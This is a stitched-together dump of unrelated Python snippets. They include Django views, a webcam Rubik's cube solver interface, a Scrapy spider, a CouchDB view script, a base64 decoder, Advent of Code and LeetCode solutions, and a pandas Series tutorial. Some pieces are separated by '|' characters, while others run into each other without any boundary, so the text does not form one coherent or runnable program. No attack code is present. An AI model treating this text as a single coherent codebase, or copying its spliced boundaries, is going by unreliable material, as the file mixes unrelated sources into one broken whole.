"""12. Using Ternary operator or COnditional operator: Identify minimum of three numbers """
a = 10
b = 20
c = 3
print(a if (a < b and a < c) else (b if (b < a and b < c)else c))
|
from django.shortcuts import render
# Create your views here.
def demo_home(request):
    """Render the demo home page."""
    return render(request, "demo_home.html", {})


def demo_sales(request):
    """Render the demo sales page."""
    return render(request, "demo_sales.html", {})


def demo_customers(request):
    """Render the demo customers page."""
    return render(request, "demo_customers.html", {})


def demo_acustomers(request):
    """Render the demo archived-customers page."""
    return render(request, "demo_acustomers.html", {})


def demo_arefund(request):
    """Render the demo refund page."""
    return render(request, "demo_arefund.html", {})


def zzz(request):
    """Render the zzz demo page."""
    return render(request, "zzz.html", {})
import numpy as np
import os
from utils.utils import from_csv_with_filenames
from utils.constants import Constants
#import matplotlib.pyplot as plt
from collections import OrderedDict
CSV_PATH = os.path.join(
Constants.DATA_FOLDER,
'10classes',
'audio_data.csv'
)
def get_prototypes(xs, ys):
    """Return {label: mean of all x in xs carrying that label}."""
    grouped = {}
    for x, label in zip(xs, ys):
        grouped.setdefault(label, []).append(x)
    result = dict()
    for label in sorted(set(ys)):
        result[label] = np.mean(np.array(grouped[label]), axis=0)
    return result
def average_prototype_distance_matrix(xs, ys, filenames):
    """
    Relies on all y in ys being in the interval [0, number of classes)
    As a general rule, x in xs and y in ys are not ordered by class but by speaker
    That is why I am not using models.som.SOMTest.classPrototype, which
    has the opposite assumption

    Prints the accumulated per-class distance matrix and shows it as an image.
    """
    # Bug fix: the module-level matplotlib import is commented out, so `plt`
    # was an undefined name whenever this ran; import it locally instead.
    import matplotlib.pyplot as plt
    n_classes = len(set(ys))
    prototype_distance_matrix = np.zeros((n_classes, n_classes))
    # Mean example ("prototype") per class — reuse the shared helper instead
    # of duplicating its grouping/averaging logic inline. Columns are ordered
    # by sorted class label, which also makes the matrix deterministic.
    prototype_dict = get_prototypes(xs, ys)
    prototypes = np.asarray(list(prototype_dict.values())).T
    for i, x in enumerate(xs):
        prototype_distance_matrix[ys[i]][:] += np.mean(np.absolute(prototypes - x.reshape((-1, 1))), axis=0).T
    print(prototype_distance_matrix)
    plt.matshow(prototype_distance_matrix, cmap=plt.get_cmap('Greys'))
    plt.show()
def examples_distance(xs, i1, i2):
    """Euclidean distance between examples i1 and i2 of xs."""
    difference = xs[i1] - xs[i2]
    return np.linalg.norm(difference)
if __name__ == '__main__':
    # Load examples; labels arrive offset by 1000 in the CSV, so shift them
    # into [0, n_classes) as average_prototype_distance_matrix requires.
    xs, ys, filenames = from_csv_with_filenames(CSV_PATH)
    ys = [int(y)-1000 for y in ys] # see comment above
    average_prototype_distance_matrix(xs, ys, filenames)
    #i1 = 23
    #i2 = 163
    #d = examples_distance(xs, i1, i2)
    #print(d)
|
import traceback
from .video_input import WebcamVideoStream
from .image_processing_utils import *
from . import *
close_flag = False
def on_close(event):
    """Matplotlib close-event callback: flag the main loop to stop."""
    global close_flag
    close_flag = True
color_names = {0:"white", 1:"red", 2:"blue", 3:"orange", 4:"green", 5:"yellow", -2: "gray", -1:"purple?"}
def face_equal_norot(face1, face2):
    """
    We check if 2 faces are equal independently of their orientation,
    i.e. under 0-3 quarter turns of the second face.
    """
    for quarter in range(4):
        if (face1 == np.rot90(face2, quarter)).all():
            return True
    return False
class Cube_calibrator:
    """Interactive Rubik's cube assistant.

    Runs a webcam loop with three phases: (1) calibrate by showing the six
    faces in a prescribed order, (2) solve in a background thread, and
    (3) guide the user move-by-move with on-screen arrows.

    NOTE(review): Cube, Cube_solver_thread, plt, cv2, np, time and the
    image-processing helpers come from the wildcard imports at module top —
    confirmed only by usage here, not by explicit imports.
    """
    def __init__(self, config):
        # Set configuration from the config file
        self.fps = config["fps"]
        self.solver_type = config["solver"]
        self.segm_method = config["segm_method"]
        self.confirm_time = config["face_confirmation_time"]
        self.tick_time = config["tick_showing_time"]
        self.on_phone = config["on_phone"]
        self.debug = config["debug"]
        # Internal parameters
        self.cam = WebcamVideoStream(fps=self.fps)
        self.last_face = -1
        self.calibrated = False
        self.solution_found = False
        self.finished = False
        self.cube = Cube(3)
        self.cube_next = None
        self.solver = None
    def arrange_cube(self, faces, colors):
        """
        With the 6 faces of the cube and knowing that they are arranged in a certain order
        we put them in the correct position and orientation.
        We return a normalized cube (that has the top face as white, left face as red and front face as blue)
        """
        # NOTE(review): `opposites` and the `colors` parameter are unused in
        # this body — confirm whether they are leftovers.
        opposites = {0:5,1:3,2:4,3:1,5:0}
        faces[0] = np.rot90(faces[0],3)
        faces[5] = np.rot90(faces[5],2)
        return Cube(3, faces).normalize()
    def get_shape_coords(self, shape_type, scale, offset, progress, rotation):
        """
        Gets the coordinates to draw some basic shapes with plots
        The shapes implemented are:
        - Circunference both complete and incomplete
        - Check mark or Tick
        - Straight arrow
        - Circle with arrow
        - Flat line

        shape_type: one of 'circle', 'tick', 'arrow', 'arrow_circle', 'dash'
        scale: size multiplier; offset: (row, col) centre in image coords;
        progress: fraction drawn (circle only); rotation: degrees.
        Returns (x_coords, y_coords) for ax.plot.
        """
        if shape_type == 'circle':
            rad_rot = np.pi*rotation/180
            max_theta = (2*np.pi)*progress
            theta = np.linspace(0, max_theta, 100)
            theta = theta + rad_rot
            indicator_x = scale*np.cos(theta)
            indicator_y = scale*np.sin(theta)
        elif shape_type == 'tick':
            indicator_x = scale*np.array([-0.5,0,0.75])
            indicator_y = scale*np.array([0,0.75,-0.75])
        elif shape_type == 'arrow':
            indicator_x = scale*np.array([-1,1,0.25,1,0.25])
            indicator_y = scale*np.array([0, 0, 0.5,0,-0.5])
            if rotation == 90:
                indicator_x, indicator_y = indicator_y, -indicator_x
            elif rotation == 180:
                indicator_x = -indicator_x
            elif rotation == 270:
                indicator_x, indicator_y = indicator_y, indicator_x
        elif shape_type == 'arrow_circle':
            theta = np.linspace(0, 3*np.pi/2, 100)
            indicator_x = scale*np.hstack([np.cos(theta), [0.2, -0.2, 0.2, -0.2, 0.2]])
            indicator_y = scale*np.hstack([np.sin(theta), [-1, -0.5, -1, -1.5, -1]])
            if rotation == 180:
                indicator_x = -indicator_x
        elif shape_type == 'dash':
            indicator_x = scale*np.array([-1,1])
            indicator_y = scale*np.array([0, 0])
        # Offset is (row, col): rows map to y, columns to x.
        indicator_x = indicator_x + offset[1]
        indicator_y = indicator_y + offset[0]
        return indicator_x, indicator_y
    def main(self, phone=True):
        """
        Executes the real time program, split in 3 phases:
        -Calibration: the cube is calibrated by pointing the camera to it's
        6 faces in a determined order indicated to the user
        -Solving: a solver thread is launched and a progress circle is shown
        -Showing solution: the solution will be shown as well as the arrow
        indicating which move to make each step

        NOTE(review): the `phone` parameter only affects the indicator offset
        while image rotation uses self.on_phone — confirm both are meant to
        be controlled independently.
        """
        self.cam.start()
        solver_thread = None
        try:
            ## Initialize plot
            # Make plots update
            plt.ion()
            # Create figure
            fig = plt.figure()
            # Make the closing of the window finish the program
            fig.canvas.mpl_connect('close_event', on_close)
            # Create a subplot to draw to
            ax = plt.subplot()
            # Initialize the subplot by drawing a picture and a line
            I_rgb = self.cam.read()
            if self.on_phone:
                I_rgb = cv2.rotate(I_rgb, cv2.ROTATE_90_CLOCKWISE)
            im = ax.imshow(np.zeros(I_rgb.shape))
            indic, = ax.plot([0,0],[0,0], linewidth=10)
            plt.show()
            # Set indicator offset
            if phone:
                indicator_offset = [I_rgb.shape[0]*(7/8), I_rgb.shape[1]/2]
            else:
                indicator_offset = [I_rgb.shape[0]/2, I_rgb.shape[1]*(7/8)]
            # Set some parameters up
            frame_time = 1/self.fps
            start = time.time()
            face_confirm_timer = 0
            tick_timer = 0
            solution_timer = 0
            prev_face = np.zeros([1,1])
            colors_checked = []
            faces = []
            solution = []
            alpha = 1
            warned = False
            # Main loop
            while not self.finished and not close_flag:
                # Measure time for FPS control
                frame_start = time.time()
                # clear last frame's data
                ax.clear()
                ## Image Aquisition
                frame_original = self.cam.read()
                # The original image will be in BGR, we transform it to RGB
                frame_original = cv2.cvtColor(frame_original, cv2.COLOR_BGR2RGB)
                if self.on_phone:
                    frame_original = cv2.rotate(frame_original, cv2.ROTATE_90_CLOCKWISE)
                ## Pre-processing
                frame_hsv, frame_original = preprocess_image(frame_original)
                ## Extraction of characteristics
                # Get binarized image, various implementations, "binarize" works best
                if self.segm_method == "binarize":
                    frame_bw = binarize(frame_hsv)
                elif self.segm_method == "borders":
                    frame_bw = filled_borders(frame_hsv)
                else:
                    frame_bw = binarize(frame_hsv)
                    if not warned:
                        print(f"WARNING: \"{self.segm_method}\" is not a valid segmentation method, we default to \"binarize\"")
                        warned = True
                # Find the features to analyze
                contours, positions = find_contours(frame_bw, debug = self.debug)
                ## Description
                face, face_positions, stiker_size = get_ordered_colors(frame_hsv, contours, debug = self.debug)
                ## User interaction
                # Initialize indicator data
                indic_size = 40
                indicator_x = []
                indicator_y = []
                indicator_color = "w"
                linestyle = "solid"
                if not self.calibrated:
                    ## Phase 1: Obtain the colors of the faces
                    plt.title("Cube calibration")
                    if face.ndim == 2 and (face == prev_face).all() and face[1,1] not in colors_checked:
                        # We are checking a new face
                        # Reset timer for the checkmark
                        tick_timer = time.time()
                        # Get progress circle to draw later
                        indicator_x, indicator_y = self.get_shape_coords("circle", indic_size, indicator_offset, (time.time() - face_confirm_timer)/self.confirm_time, 0)
                        indicator_color = "orange"
                        # When the timer finishes add the face to out list of faces
                        if time.time() - face_confirm_timer > self.confirm_time:
                            colors_checked.append(face[1,1])
                            faces.append(face)
                            self.last_face = face[1,1]
                            if len(faces) == 6:
                                self.calibrated = True
                    elif face.ndim == 2 and (face == prev_face).all() and face[1,1] in colors_checked and time.time() - tick_timer < self.tick_time:
                        # The face we are seeing is already stored
                        # Reset timer for face confirmation
                        face_confirm_timer = time.time()
                        # Get green check mark to draw later
                        indicator_x, indicator_y = self.get_shape_coords("tick", indic_size, indicator_offset, 0, 0)
                        indicator_color = "green"
                    else:
                        # Reset timer for face confirmation
                        face_confirm_timer = time.time()
                        # Update the face
                        prev_face = face
                        # Show user the direction in which they have to rotate the cube
                        if len(colors_checked) == 0:
                            indicator_x, indicator_y = self.get_shape_coords("dash", indic_size, indicator_offset, 0, 0)
                        elif len(colors_checked) in [1,5]:
                            indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, indicator_offset, 0, 270)
                        elif len(colors_checked) in [2,3,4]:
                            indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, indicator_offset, 0, 0)
                        indicator_color = "w"
                    # Show color text
                    if face_positions is not None:
                        face_list = face.flatten()
                        for i in range(face_positions.shape[1]):
                            # Calculate text size, linear equation with points (4000,10),(900,5)
                            m = (10-5)/(4000-900)
                            area = stiker_size[0]*stiker_size[1]
                            text_size = m*(area-4000) + 10
                            # Don't make smaller than size 6
                            text_size = max(text_size, 6)
                            # Show the name of the color of each sticker
                            ax.annotate(color_names[face_list[i]], face_positions[:,i], color='#F0F0F0', size=text_size, ha='center', fontweight="heavy")
                elif not self.solution_found:
                    ## Phase 2: Solve cube in a thread
                    if self.solver is None:
                        # Launch the solver thread
                        # Arrange faces aquired into a cube
                        self.cube = self.arrange_cube(faces, colors_checked)
                        # Launch solver thread
                        self.solver = Cube_solver_thread(self.cube, self.solver_type)
                        self.solver.setDaemon(True)
                        self.solver.start()
                        #
                        solution_timer = time.time()
                    if self.solver.solution_found:
                        # The solver has found a solution, go to the next phase
                        plt.title("Showing cube solution")
                        self.solution_found = True
                        # Show solution on the console
                        print("Solution in text form:")
                        print(self.solver.solution)
                        print(f"It took {time.time() - solution_timer} seconds to find the solution")
                        # Set up the solution list for the next phase
                        solution = self.solver.solution
                        solution.append("--")
                        # Store a cube with one of the moves done for next phase
                        self.cube_next = self.cube.turn(solution[0])
                    else:
                        # The solver is not done yet, be nice to the user, they might get impatient
                        plt.title("Solving cube...")
                        # Show rotating section of a circle
                        indicator_x, indicator_y = self.get_shape_coords("circle", indic_size, indicator_offset, 0.2, (time.time() - solution_timer)*180)
                        indicator_color = "white"
                elif solution[0] != 'Incorrect cube solver' and solution[0] != '--':
                    ## Phase 3: Show solution steps
                    if self.debug:
                        print(self.cube.toStringColor())
                        print(self.cube_next.toStringColor())
                    plt.title("Showing solution")
                    # Check for colors that would never be on the stickers of a rubik's cube
                    has_bad_colors = False
                    if face.ndim == 2:
                        has_bad_colors = (face < 0).any()
                    if has_bad_colors and self.debug:
                        print("Bad colors found")
                    if face.ndim == 2 and not has_bad_colors:
                        # We are looking at a face right now
                        # The color of the center tells us which face we are looking at
                        face_color = int(face[1,1])
                        # We get the rotation we would have to do to a normalized cube for
                        # it to be oriented like our cube
                        transform, unique = self.cube.face_to_front(face)
                        # We apply the transformation to the first move of the solution
                        relative_move = transformAlg([solution[0]], transform)[0]
                        if relative_move[0] not in ['B', 'F'] and face_equal_norot(self.cube_next.faces[face_color,:,:], face):
                            # Show progress circle to confirm that the face has been turned correctly
                            indicator_x, indicator_y = self.get_shape_coords("circle", indic_size, indicator_offset, 2*(time.time() - face_confirm_timer)/self.confirm_time, 0)
                            indicator_color = "orange"
                            # If the timer is done, go to the next step of the solution
                            if time.time() - face_confirm_timer > self.confirm_time/2:
                                self.cube = self.cube.turn(solution.pop(0))
                                self.cube_next = self.cube_next.turn(solution[0])
                        elif face_equal_norot(self.cube.faces[face_color,:,:], face):
                            # Reset the confirmation timer
                            face_confirm_timer = time.time()
                            # We initiate some parameters
                            face_pos_aux = face_positions[[1,0],:]
                            rot = 0
                            indic_size = 80
                            if relative_move[-1] == "'":
                                rot = 180
                            # We show an arrow indicating the next move that the user must perform
                            arrow_pos = [0,0]
                            if relative_move[0] == 'U':
                                arrow_pos = face_pos_aux[:,1]
                                indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, arrow_pos, 0, (180+rot)%360)
                                arrow_pos = arrow_pos + np.array([-40,0])
                            elif relative_move[0] == 'D':
                                arrow_pos = face_pos_aux[:,7]
                                indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, arrow_pos, 0, (rot)%360)
                                arrow_pos = arrow_pos + np.array([-40,0])
                            elif relative_move[0] == 'R':
                                arrow_pos = face_pos_aux[:,5]
                                indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, arrow_pos, 0, 90 + rot)
                                arrow_pos = arrow_pos + np.array([0,40])
                            elif relative_move[0] == 'L':
                                arrow_pos = face_pos_aux[:,3]
                                indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, arrow_pos, 0, 270 - rot)
                                arrow_pos = arrow_pos + np.array([0,40])
                            elif relative_move[0] == 'F':
                                arrow_pos = face_pos_aux[:,4]
                                indicator_x, indicator_y = self.get_shape_coords("arrow_circle", indic_size, arrow_pos, 0, rot)
                                arrow_pos = arrow_pos + np.array([120,0])
                            elif relative_move[0] == 'B':
                                arrow_pos = face_pos_aux[:,4]
                                indicator_x, indicator_y = self.get_shape_coords("arrow_circle", indic_size, arrow_pos, 0, (180+rot)%360)
                                arrow_pos = arrow_pos + np.array([120,0])
                                linestyle = "dashed"
                            indicator_color = "#66ccff"
                            if relative_move[-1] == "2":
                                ax.annotate("x2", (arrow_pos[1], arrow_pos[0]), color='white', size=20, ha='center', fontweight="heavy")
                            if relative_move[0] in ['B', 'F']:
                                # We cannot work with B or F moves, performing them doesn't change the face making it
                                # imposible to guide the user towards the solution
                                ax.annotate("Change face please", face_positions[:,4], color='white', size=10, ha='center')
                        else:
                            face_pos_aux = face_positions[[1,0],:]
                            ax.annotate("Your last move was wrong, try again", face_pos_aux[[1,0],1], color='white', size=10, ha='center')
                    else:
                        # Reset confirmation timer
                        face_confirm_timer = time.time()
                        # Show the entire solution in the screen
                        ax.annotate(" ".join(solution[:-1]), (indicator_offset[1], indicator_offset[0]), color='white', size=15, ha='center')
                else:
                    ## END: We are done, close the app
                    print("CONGRATULATIONS, YOUR CUBE IS NOW SOLVED.")
                    self.finished = True
                # Draw indicator
                ax.plot(indicator_x, indicator_y, indicator_color, linewidth = 6, linestyle = linestyle)
                ## Display
                im = ax.imshow(np.zeros(I_rgb.shape))
                im.set_data(frame_original)
                # Update plot
                fig.canvas.draw_idle()
                fig.canvas.flush_events()
                # Measure time for FPS control
                frame_end = time.time()
                # Limit FPS
                time_passed = frame_end - frame_start
                if time_passed < frame_time:
                    time.sleep(frame_time-time_passed)
        except KeyboardInterrupt:
            print("Manually interrupted")
        except Exception:
            traceback.print_exc()
        if solver_thread is not None:
            solver_thread.join()
        self.cam.stop()
        # NOTE(review): __init__ defines self.last_face; `current_face` is
        # written here but never read in this file — confirm which attribute
        # name is intended.
        self.current_face = -1
|
"""
Dictionary
* Translator playground
📚 Resources:
https://www.youtube.com/watch?v=rfscVS0vtbw&t=1s&ab_channel=freeCodeCamp.org
"""
vowel = ['a', 'e', 'i', 'o', 'u']

# Translate function: every vowel becomes 'g' ('G' when uppercase).
def translate(phrase):
    """Return *phrase* with each vowel replaced by g/G; other chars kept."""
    return ''.join(
        ('G' if letter.isupper() else 'g') if letter.lower() in vowel else letter
        for letter in phrase
    )
# Interactive entry point: translate a phrase typed by the user.
print(translate(input('Enter a phrase: ')))
|
import sys
from PyQt5.uic import loadUi
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QDialog, QApplication, QWidget
from PyQt5.QtGui import QPixmap
from qt_material import apply_stylesheet # pip install qt-material
class WelcomeScreen(QDialog):
    """First screen of the application; widget tree is loaded from my.ui."""
    def __init__(self):
        super(WelcomeScreen, self).__init__()
        # Build the dialog's widgets from the Qt Designer file.
        loadUi("my.ui",self)
        # Navigation hooks (target screens not implemented yet):
        #self.login.clicked.connect(self.gotologin)
        #self.create.clicked.connect(self.gotocreate)
# Application bootstrap: a fixed-size stacked-widget shell holding the
# welcome screen, themed with qt-material.
app = QApplication(sys.argv)
welcome = WelcomeScreen()
widget = QtWidgets.QStackedWidget()
apply_stylesheet(app, theme='dark_cyan.xml')
widget.addWidget(welcome)
widget.setFixedHeight(800)
widget.setFixedWidth(1200)
widget.show()
try:
    sys.exit(app.exec_())
except:
    # NOTE(review): bare except also swallows the SystemExit raised by
    # sys.exit(); presumably intentional to print a clean message — confirm.
    print("Exiting")
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from scrapy.loader import ItemLoader
from scraper.items import MatchItem as Match
import json
class FutureSpider(CrawlSpider):
    """Scrapes the Goultarminator tournament calendar and yields each game's
    two teams paired with their compositions from a local teams.json file."""
    name = 'future'
    start_urls = [
        'http://www.dofus.com/fr/mmorpg/communaute/tournois/goultarminator/calendrier?date=2016-08-10#jt_list/',
    ]
    def parse(self, response):
        # Team names appear in document order; every two consecutive names
        # form one game.
        self.games = []
        game = []
        for team in response.css('table.ak-ladder tr td:first-child a::text').extract():
            # team_with_composition = [team, composition]
            if len(game) == 0:
                game = [team]
            else:
                game.append(team)
                self.games.append(game)
                game = []
        # Attach each team's composition, emitting one entry per game.
        games_with_composition = []
        for game in self.games:
            i = 0
            teams_with_composition = []
            for team in game:
                i = i + 1
                team_with_composition = [str(team), self.get_team_composition(team)]
                teams_with_composition.append(team_with_composition)
                if i == 2:
                    i = 0
                    games_with_composition.append(teams_with_composition)
        print(games_with_composition)
        yield {
            'games': games_with_composition
        }
    def get_team_composition(self, team_name):
        # Case-insensitive lookup; returns None when the team is unknown.
        # NOTE(review): teams.json is re-opened and re-parsed on every call —
        # consider caching if the team list grows.
        with open('teams.json') as data_file:
            servers = json.load(data_file)
            for server in servers:
                for team in server['teams']:
                    if team['name'] == team_name.lower():
                        return team.get('composition')
# Read an inclusive range [a, b] from stdin.
a = int(input())
b = int(input())
indeks = a
# Print every even number from a through b (inclusive).
while indeks <= b:
    if indeks%2 == 0:
        print(indeks)
    indeks += 1
# NOTE(review): this second pass prints evens in [0, b) regardless of the
# entered start, and reuses `a` as the loop variable — confirm it is
# intentional (e.g. a second exercise variant) and not leftover code.
for a in range(b):
    if a%2 == 0:
        print(a)
"""
#十進制轉換
(若為 C 語言,請使用一個 loop 和 function call)
給予一個十進位整數,請撰寫一程式可以將此十進位整數轉換為指定的進制的整數。
輸入說明:
輸入分為兩部份,包括指定的進制數
(2 ~ 16)
與十進位整數(0 ~ 1000000000)
輸出說明:
經轉換後的新進位制的整數( y )
不合法的輸入則輸出E
input:
16 1234
output:
4D2
----------------------
Input:
8 56456456
Output:
327272410
-----------------------
Input:
11 17489465
Output:
9966104
-----------------------
Input:
4 17489
Output:
10101101
"""
def cal(a, b):
    """Return the base-*b* digits of *a*, least-significant digit first.

    The caller reverses the string (see ``output``) to obtain the usual
    most-significant-first representation.

    Bug fix: the original appended the final (most significant) digit with
    ``str(a)`` even when that digit was >= 10, so e.g. cal(12, 16) produced
    '12' instead of 'C'. All digits now go through one lookup table.
    """
    digits = '0123456789ABCDEF'
    if a == 0:
        return '0'
    str_tran = ''
    while a > 0:
        str_tran = str_tran + digits[a % b]
        a = a // b
    return str_tran
def output(ans):
    """Reverse a digit string into most-significant-first order."""
    return ''.join(reversed(ans))
def main():
    """Read "<base> <decimal>" from stdin and print the converted number,
    or 'E' when base not in [2,16] or value not in [0, 1e9]."""
    x=input()
    y=str.split(x)
    if(int(y[0])<2 or int(y[0])>16 or int(y[1])<0 or int(y[1])>1000000000):
        print('E')
    else:
        # cal() yields digits least-significant first; output() reverses.
        ans=cal(int(y[1]),int(y[0]))
        ans=output(ans)
        print(ans)
main()
import couchdb
import urllib2
import json
dbName = 'tweets3'
ServerUrl = "http://127.0.0.1:5984/"
designName = 'suburbs'

server = couchdb.Server(ServerUrl)
db = server[dbName]

# Map every tweet to its suburb; the _count reduce yields per-suburb totals.
test_view = """function (doc) {
    emit(doc.suburb, 1);
}"""
design = {'views': {"sub_lst": {'map': test_view, 'reduce': '_count'}}, 'language': 'javascript'}
# Store the design document (the "".join wrapper was a no-op and is gone).
db["_design/"+designName] = design

url = ServerUrl+dbName+'/_design/'+designName+'/_view/sub_lst?reduce=true&group_level=1'
contents = urllib2.urlopen(url).read()
# Bug fix: the response variable is `contents`; `content` was an undefined
# name and raised NameError at runtime.
data = json.loads(contents.decode("utf-8").replace("'", '"'))
print(data)
|
import base64
# base64编码原理:https://blog.csdn.net/zhubaoJay/article/details/72957135
'''
print(base64.b64encode(b'binary\x00string'))
print(base64.b64decode(b'YmluYXJ5AHN0cmluZw=='))
print(base64.b64encode(b'i\xb7\x1d\xfb\xef\xff'))
print(base64.urlsafe_b64encode(b'i\xb7\x1d\xfb\xef\xff'))
# 标准base64编码后可能出现+和/,在URL中不能直接作为参数
# urlsafe将+和/转化为-和_
print(base64.urlsafe_b64decode('abcd--__'))
'''
def safe_base64_decode(s):
    """Decode base64 text that may be missing its trailing '=' padding.

    Accepts str or bytes. Prints the decoded value (preserving the original
    behaviour) and now also returns it, so callers can use the result.
    """
    if isinstance(s, str):
        s = s.encode('utf-8')
    # b64decode requires input length to be a multiple of 4; restore any
    # stripped '=' padding (the original only converted/padded on one path).
    remainder = len(s) % 4
    if remainder:
        s = s + b'=' * (4 - remainder)
    decoded = base64.b64decode(s)
    print(decoded)
    return decoded
if __name__ == '__main__':
    # Interactive entry point: decode a base64 string typed by the user.
    a = input('please input compiled str:')
    safe_base64_decode(a)
from functools import reduce
def knot_hash_round(lst, lengths, pos, skip):
    """One round of the AoC 2017 day-10 knot hash.

    For each length, reverse that many elements of the circular list *lst*
    starting at *pos*, then advance pos by length + skip and bump skip.
    Mutates lst in place and returns the updated (pos, skip).
    """
    size = len(lst)
    for length in lengths:
        span = [(pos + offset) % size for offset in range(length)]
        reversed_values = [lst[i] for i in reversed(span)]
        for index, value in zip(span, reversed_values):
            lst[index] = value
        # pos is only ever used modulo size, so accumulating the reduced
        # step keeps behaviour identical to a plain (pos + length + skip).
        pos += (length + skip) % size
        skip += 1
    return pos, skip
def part_1():
    """AoC 2017 day 10 part 1: one knot-hash round over comma-separated
    integer lengths read from the input file; prints lst[0] * lst[1]."""
    lengths = []
    with open('input/day10_input', 'r') as f:
        lengths = [int(l) for l in f.readline().strip().split(',')]
    lst = [i for i in range(256)]
    pos = 0
    skip = 0
    pos, skip = knot_hash_round(lst, lengths, pos, skip)
    print('Part 1: {}'.format(lst[0] * lst[1]))
def part_2():
    """AoC 2017 day 10 part 2: treat the input as ASCII codes plus the
    standard suffix, run 64 rounds, then XOR 16-byte groups into the dense
    hash and print it as 32 hex digits."""
    lengths = []
    with open('input/day10_input', 'r') as f:
        # Standard suffix lengths mandated by the puzzle.
        lengths = [ord(l) for l in f.readline().strip()] + [17, 31, 73, 47, 23]
    lst = [i for i in range(256)]
    pos = 0
    skip = 0
    for r in range(64):
        pos, skip = knot_hash_round(lst, lengths, pos, skip)
    # Dense hash: XOR each block of 16 sparse-hash values.
    dense_hash = [reduce(lambda x, y: x ^ y, lst[i*16:(i+1)*16]) for i in range(16)]
    print('Part 2: {}'.format(''.join(format(i, '02x') for i in dense_hash)))
# Run both puzzle parts when the module is executed.
part_1()
part_2()
|
#!/usr/bin/env python3
if __name__ == "__main__":
    # Process trip descriptions until a sentinel of -1 is entered.
    while True:
        i = int(input())
        if i == -1:
            break
        d = 0    # cumulative elapsed time consumed so far
        tot = 0  # total miles travelled on this trip
        for ii in range(i):
            # Each line: speed and a cumulative elapsed-time reading —
            # presumably (speed, time) per leg; confirm against problem spec.
            s, t = list(map(int, input().split()))
            t = t-d   # convert the cumulative reading into this leg's duration
            d+=t      # advance the cumulative marker
            tot += t * s  # distance = speed * duration
        print("{} miles".format(tot))
|
"""
Solution for 340. Longest Substring with At Most K Distinct Characters
https://leetcode.com/problems/longest-substring-with-at-most-k-distinct-characters/
"""
from collections import defaultdict
from collections import OrderedDict
class Solution:
    """
    Runtime: 72 ms, faster than 86.01% of Python3 online submissions for Longest Substring with At Most K Distinct Characters.
    Memory Usage: 12.9 MB, less than 100.00% of Python3 online submissions for Longest Substring with At Most K Distinct Characters.
    """
    def lengthOfLongestSubstringKDistinct(self, s: str, k: int) -> int:
        """
        Given a string, find the length of the longest substring T that contains at most k distinct characters.
        Example 1:
        Input: s = "eceba", k = 2
        Output: 3
        Explanation: T is "ece" which its length is 3.
        Example 2:
        Input: s = "aa", k = 1
        Output: 2
        Explanation: T is "aa" which its length is 2.
        Args:
            s:
            k:
        Returns:
        """
        # Delegates to the O(N)-time / O(K)-space sliding-window variant.
        return self.optimal_solution(s, k)
    def initial_solution(self, s: str, k: int) -> int:
        """
        An initial solution that runs in O(N) in time and O(K) in space.
        Sliding window [i, j) with a character-frequency counter; the window
        grows until it holds more than k distinct characters, then shrinks
        from the left until valid again.
        Args:
            s:
            k:
        Returns:
        """
        counter = defaultdict(int)
        i, j, res = 0, 0, 0
        while j < len(s):
            # Expand the right edge while at most k distinct chars are inside.
            while j < len(s) and len(counter) <= k:
                counter[s[j]] += 1
                j += 1
                if len(counter) <= k:
                    res = max(res, j - i)
            # Shrink from the left until the window is valid again.
            while i < j and len(counter) > k:
                counter[s[i]] -= 1
                if counter[s[i]] == 0:
                    del counter[s[i]]
                i += 1
        return res
    def optimized_solution(self, s: str, k: int) -> int:
        """
        A time optimized solution that runs in O(NK) in time and O(k) in space.
        Stores only each character's most recent index; eviction removes the
        character whose last occurrence is oldest (the min over the map).
        Args:
            s:
            k:
        Returns:
        """
        index_map = {}
        i, j, res = 0, 0, 0
        while j < len(s):
            while j < len(s) and len(index_map) <= k:
                index_map[s[j]] = j
                j += 1
                if len(index_map) <= k:
                    res = max(res, j - i)
            while i < j and len(index_map) > k:
                # O(K) scan for the leftmost last-occurrence.
                i = min(index_map.values())
                del index_map[s[i]]
                i += 1
        return res
    def optimal_solution(self, s: str, k: int) -> int:
        """
        An optimal solution combining the initial and optimized solution. It runs
        in O(N) in time and O(K) in space.
        Uses an OrderedDict as an LRU of character -> last index: re-inserting
        a seen character moves it to the end, so the front entry is always the
        one whose last occurrence is oldest and can be popped in O(1).
        Args:
            s:
            k:
        Returns:
        """
        ordered_map = OrderedDict()
        i, j, res = 0, 0, 0
        while j < len(s):
            while j < len(s) and len(ordered_map) <= k:
                if s[j] in ordered_map:
                    # Refresh recency by re-inserting at the end.
                    del ordered_map[s[j]]
                ordered_map[s[j]] = j
                j += 1
                if len(ordered_map) <= k:
                    res = max(res, j - i)
            while i < j and len(ordered_map) > k:
                # Evict the least-recently-seen character in O(1).
                _, i = ordered_map.popitem(last=False)
                i += 1
        return res
|
from typing import Optional, Union
__all__ = ["MissingSerializerError", "IncompleteOrCorruptedStreamError"]
class MissingSerializerError(Exception):
    """
    Raised when trying to serialize a value whose type is not registered
    with a serializer.
    """
    # Marker exception only; carries no extra state.
class IncompleteOrCorruptedStreamError(Exception):
    """
    Raised when trying to deserialize a value from a stream, but the stream
    is incomplete or corrupted.
    """

    def __init__(self, popped_bytes: Optional[Union[bytes, bytearray]] = None):
        # Keep whatever bytes were already consumed so callers can recover
        # them; any falsy value (None, b"", empty bytearray) becomes b"".
        self.popped_bytes = popped_bytes if popped_bytes else bytes()
|
import numpy as np
import pandas as pd
# ---- pandas Series basics (tutorial script; each section prints its result) ----
# Creating a Series from a plain Python list (gets a default 0..n-1 index).
mylist=['m','h','n']
print(pd.Series(data=mylist))
print('\n')
# Assigning custom labels to the index instead of the default integers.
labels =['bad', 'good', 'unknown']
print(pd.Series(data=mylist,index=labels))
print('\n')
# Creating a Series from a NumPy array.
array=np.array([2,4,6])
print(pd.Series(array))
print('\n')
# Creating a Series from a dictionary: keys become the index labels.
Dict={'love':'spiritual','business':'creative'}
print(pd.Series(Dict)) # index labels are taken from the dict keys
print('\n')
#####################
# Operations on the index: arithmetic aligns values by label, not position.
se1=pd.Series([1,2,3,4],index=['USA','UK','Russia','NK'])
se2=pd.Series([4,0,2,1],index=['USA','Myanmar','Russia','SK'])
